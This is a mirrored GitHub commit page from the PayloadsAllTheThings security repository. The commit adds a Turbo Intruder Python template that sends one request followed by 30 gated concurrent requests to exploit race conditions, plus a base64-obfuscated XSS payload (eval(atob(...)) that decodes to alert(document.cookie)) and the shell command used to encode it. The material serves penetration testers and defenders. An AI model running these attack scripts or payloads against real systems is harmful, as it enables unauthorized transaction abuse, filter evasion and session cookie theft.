ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-19 02:46:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Merge pull request #460 from idealphase/master

Browse Source 
Update XSS README.md & Update Race Condition README.md
This commit is contained in:
Swissky 2022-04-19 11:34:18 +02:00 committed by GitHub
commit b8bfa1f226
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 39 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

31
Race Condition/README.md
View File

@ -41,6 +41,37 @@
3. Now set the external HTTP header x-request: %s - :warning: This is needed by the turbo intruder 3. Now set the external HTTP header x-request: %s - :warning: This is needed by the turbo intruder
4. Click "Attack" 4. Click "Attack"
## Turbo Intruder 2 Requests Examples
This follwoing template can use when use have to send race condition of request2 immediately after send a request1 when the window may only be a few milliseconds.
```python
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=30,
requestsPerConnection=100,
pipeline=False
)
request1 = '''
POST /target-URI-1 HTTP/1.1
Host: <REDACTED>
Cookie: session=<REDACTED>
parameterName=parameterValue
'''
request2 = '''
GET /target-URI-2 HTTP/1.1
Host: <REDACTED>
Cookie: session=<REDACTED>
'''
engine.queue(request1, gate='race1')
for i in range(30):
engine.queue(request2, gate='race1')
engine.openGate('race1')
engine.complete(timeout=60)
def handleResponse(req, interesting):
table.add(req)
```
## References ## References

7
XSS Injection/README.md
View File

@ -663,6 +663,12 @@ You can bypass a single quote with &#39; in an on mousedown event handler
Convert IP address into decimal format: IE. `http://192.168.1.1` == `http://3232235777` Convert IP address into decimal format: IE. `http://192.168.1.1` == `http://3232235777`
http://www.geektools.com/cgi-bin/ipconv.cgi http://www.geektools.com/cgi-bin/ipconv.cgi
```javascript
<script>eval(atob("YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="))<script>
```
Base64 encoding your XSS payload with Linux command: IE. `echo -n "alert(document.cookie)" | base64` == `YWxlcnQoZG9jdW1lbnQuY29va2llKQ==`
### Bypass parenthesis for string ### Bypass parenthesis for string
```javascript ```javascript
@ -1249,3 +1255,4 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld
- [mXSS Attacks: Attacking well-secured Web-Applications by using innerHTML Mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius, Edward Z. Yang](https://cure53.de/fp170.pdf) - [mXSS Attacks: Attacking well-secured Web-Applications by using innerHTML Mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius, Edward Z. Yang](https://cure53.de/fp170.pdf)
- [Self Closing Script](https://twitter.com/PortSwiggerRes/status/1257962800418349056) - [Self Closing Script](https://twitter.com/PortSwiggerRes/status/1257962800418349056)
- [Bypass < with ](https://hackerone.com/reports/639684) - [Bypass < with ](https://hackerone.com/reports/639684)
- [Bypassing Signature-Based XSS Filters: Modifying Script Code](https://portswigger.net/support/bypassing-signature-based-xss-filters-modifying-script-code)